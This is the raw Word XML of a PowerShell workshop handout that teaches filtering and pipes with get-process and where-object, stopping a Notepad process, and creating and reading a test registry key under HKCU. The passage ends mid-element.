    <w:p w14:paraId="3E123D55" w14:textId="77777777" w:rsidR="00EB5B0F" w:rsidRDefault="00EB5B0F"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5CC7B168" w14:textId="77777777" w:rsidR="00EB5B0F" w:rsidRPr="00CA4184" w:rsidRDefault="00EB5B0F" w:rsidP="00CA4184">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73EDC037" w14:textId="186DDCB7" w:rsidR="00EB5B0F" w:rsidRDefault="00552D58" w:rsidP="00CA4184">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA4184">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Get more familiarity with filtering and pipes.</w:t>
      </w:r>
      <w:r w:rsidR="00CA4184">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this section we will do the following actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3B13A7" w14:textId="1D565A38" w:rsidR="00CA4184" w:rsidRPr="00CA4184" w:rsidRDefault="00CA4184" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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op a process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F3EB3B" w14:textId="77777777" w:rsidR="00EB5B0F" w:rsidRDefault="00EB5B0F" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6293E39D" w14:textId="77777777" w:rsidR="00EB5B0F" w:rsidRDefault="00EB5B0F"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E8FEC2E" w14:textId="77777777" w:rsidR="00EB5B0F" w:rsidRDefault="00EB5B0F" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52649200" w14:textId="25582EEA" w:rsidR="00EB5B0F" w:rsidRDefault="00023A3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n class we used the get-</w:t>
      </w:r>
      <w:r w:rsidR="002B7D9D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cmd</w:t>
      </w:r>
      <w:r w:rsidR="005B27AA">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>et to learn about filtering and pipes to further refine how we interact with the cmdlets and/or their outputs. Now it’s time to practice on your own.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE7A35A"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4A72A0F1" w14:textId="5AD81968"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process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9510F3" w14:textId="34AE7B6E"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op-process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B7F420" w14:textId="42A0B9BF"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member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331D2BCB" w14:textId="22D12280"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ere-object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC648E7" w14:textId="77777777" w:rsidR="006E1CD4" w:rsidRPr="005525A0" w:rsidRDefault="006E1CD4" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7741FC6A" w14:textId="77777777" w:rsidR="00EB5B0F" w:rsidRDefault="00EB5B0F" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397D565C" w14:textId="77777777" w:rsidR="00EB5B0F" w:rsidRPr="003A12DF" w:rsidRDefault="00EB5B0F"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1866D7F9" w14:textId="77777777" w:rsidR="00EB5B0F" w:rsidRDefault="00EB5B0F" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C78290C" w14:textId="77777777" w:rsidR="00EB5B0F" w:rsidRPr="00F256E3" w:rsidRDefault="005019E2" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F256E3">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stage 1</w:t>
      </w:r>
      <w:r w:rsidR="00EB5B0F" w:rsidRPr="00F256E3">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00DF2655" w:rsidRPr="00F256E3">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Let</w:t>
      </w:r>
      <w:r w:rsidRPr="00F256E3">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00DF2655" w:rsidRPr="00F256E3">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s look at the get-process cmdlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB9709" w14:textId="77777777" w:rsidR="00DF2655" w:rsidRPr="00DF2655" w:rsidRDefault="00DF2655" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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 get-process -examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656E20C4" w14:textId="1E9E2064" w:rsidR="00EB5B0F" w:rsidRPr="00D9304D" w:rsidRDefault="00DF2655" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the example 10 </w:t>
      </w:r>
      <w:r w:rsidR="00DB1131">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>get-process |where {</w:t>
      </w:r>
      <w:r w:rsidR="00195792" w:rsidRPr="00D9304D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00195792" w:rsidRPr="00D9304D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mainwindowtitle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00195792" w:rsidRPr="00D9304D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">}|format-table id, name, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00195792" w:rsidRPr="00D9304D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mainwindowtitle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00195792" w:rsidRPr="00D9304D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB1131">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D9304D" w:rsidRPr="00D9304D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00195792" w:rsidRPr="00D9304D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>autosize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CEBD9A4" w14:textId="77777777" w:rsidR="00D9304D" w:rsidRDefault="00D9304D" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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the command and see the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F094BA3" w14:textId="77777777" w:rsidR="00EB5B0F" w:rsidRDefault="00195792" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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at does format-table do?</w:t>
      </w:r>
      <w:r w:rsidR="005019E2">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Can this be used as a “filter”? Try adding different fields to it, not including it … </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A764A2" w14:textId="77777777" w:rsidR="005019E2" w:rsidRPr="005019E2" w:rsidRDefault="005019E2" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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process |get-member does this provide other details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACC9271" w14:textId="77777777" w:rsidR="00D9304D" w:rsidRPr="00622089" w:rsidRDefault="00D9304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 Stop a process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351AA8A2" w14:textId="496B6B2B"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Open a notepad window (we don’t want to kill any important processes</w:t>
      </w:r>
      <w:r w:rsidR="002B7D9D">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC40F70"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ing get-process find the process ID of the notepad process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E912B8F" w14:textId="77777777" w:rsidR="00D9304D" w:rsidRDefault="00D9304D" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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n’t forget the Where-object filter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1240C7B2"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Instead of a where-object what happens if you type get-process notepad? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Go ahead and try it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A39BAB9"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stop a process we could use the stop-process cmdlet but that is too easy. Instead let’s try with a pipe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BD3AD9" w14:textId="77777777" w:rsidR="00D9304D" w:rsidRDefault="00D9304D" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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process notepad | stop-process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D878966" w14:textId="77777777" w:rsidR="00F14BA5" w:rsidRDefault="00F14BA5" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13AEDD8E" w14:textId="50D2B020" w:rsidR="00F14BA5" w:rsidRDefault="00F14BA5"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5 </w:t>
      </w:r>
      <w:r w:rsidR="002B7613">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36765FB6" w14:textId="77777777" w:rsidR="00F14BA5" w:rsidRDefault="00F14BA5" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76429BC3" w14:textId="77777777" w:rsidR="00F14BA5" w:rsidRDefault="00F14BA5"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745E6F17" w14:textId="77777777" w:rsidR="00F14BA5" w:rsidRPr="00CA4184" w:rsidRDefault="00F14BA5" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65D8AAE2" w14:textId="14CFC8D9" w:rsidR="00F14BA5" w:rsidRDefault="002B7D9D" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA4184">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gaining experience readi</w:t>
      </w:r>
      <w:r w:rsidR="00D50D65" w:rsidRPr="00CA4184">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ng and writing to the registry. To do so, you may need to run PowerShell as admin.</w:t>
      </w:r>
      <w:r w:rsidR="00CA4184">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this section we will do the following actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2914AC2E" w14:textId="1DF77EDE"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reate the HKCU:\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>psclass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3ACADE45" w14:textId="21E15033"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Create a value named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bsidesdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1BEE5937" w14:textId="4B654530"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et that value to 7 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071C152A" w14:textId="5B648DC0" w:rsidR="00CA4184" w:rsidRP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onfirm it exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44207EBC" w14:textId="77777777" w:rsidR="00F14BA5" w:rsidRDefault="00F14BA5" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DAADBF2" w14:textId="77777777" w:rsidR="00F14BA5" w:rsidRDefault="00F14BA5"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0EC4B11A" w14:textId="77777777" w:rsidR="00F14BA5" w:rsidRDefault="00F14BA5" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474788EF" w14:textId="77777777" w:rsidR="006E1CD4" w:rsidRDefault="002B7D9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As demoed, the script can interact with the registry to determine where to watch – we will be doing a similar function by learning how to read/manipulate the registry. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACAF249" w14:textId="1E5D197C" w:rsidR="00F14BA5" w:rsidRDefault="002B7D9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4BC5B20B" w14:textId="6838C4DE" w:rsidR="002B7D9D"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ew-item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381712CB" w14:textId="561C0955"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et-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>item</w:t>
      </w:r>
      <w:r w:rsidR="00F4582F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C22D465" w14:textId="51E6E6B5"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item  &amp; Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>itemproperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="225FD7CF" w14:textId="222D84AC"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est-path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BDAB11" w14:textId="77777777" w:rsidR="00F14BA5" w:rsidRDefault="00F14BA5" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75588F21" w14:textId="77777777" w:rsidR="00F14BA5" w:rsidRPr="003A12DF" w:rsidRDefault="00F14BA5"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6177CAAA" w14:textId="77777777" w:rsidR="00F14BA5" w:rsidRDefault="00F14BA5" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C9816BB" w14:textId="77777777" w:rsidR="006D4A11" w:rsidRPr="00A136B4" w:rsidRDefault="006D4A11" w:rsidP="006D4A11">
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">Stage 1: Getting to the registry. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1A66E8" w14:textId="77777777" w:rsidR="006D4A11" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">As we saw earlier in PowerShell it is easy to navigate to the registry by just </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>CDing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35747D7E" w14:textId="77777777" w:rsidR="006D4A11" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t>Cd to the HKCU registry path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A96709B" w14:textId="50FF1540" w:rsidR="006D4A11" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">Getting an error? Make sure you type </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>HKCU:\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="131D280D" w14:textId="77777777" w:rsidR="006D4A11" w:rsidRDefault="006D4A11" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">Run a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> from there. What is returned? This should be familiar to you if you have been following along.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580509B4" w14:textId="60963EAE" w:rsidR="006D4A11" w:rsidRPr="00A136B4" w:rsidRDefault="006D4A11" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t>Now navigate to the Software registry key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7060B419" w14:textId="476A79DD" w:rsidR="006D4A11" w:rsidRPr="00A136B4" w:rsidRDefault="006D4A11" w:rsidP="006D4A11">
      <w:r w:rsidRPr="00A136B4">
        <w:t>Stage 2: Creating a new (verb) registry item (noun) under the software registry key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FFE732" w14:textId="77777777" w:rsidR="006D4A11" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t>To create a new key we will leverage the new-item cmdlet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC713AD" w14:textId="77777777" w:rsidR="006D4A11" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t>Get-help new-item if you want to learn more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE85BD0" w14:textId="77777777" w:rsidR="006D4A11" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t>New-item basically, as name implies creates a new item (key in this case) in the registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F520551" w14:textId="77777777" w:rsidR="006D4A11" w:rsidRDefault="006D4A11" w:rsidP="006D4A11">
      <w:pPr>
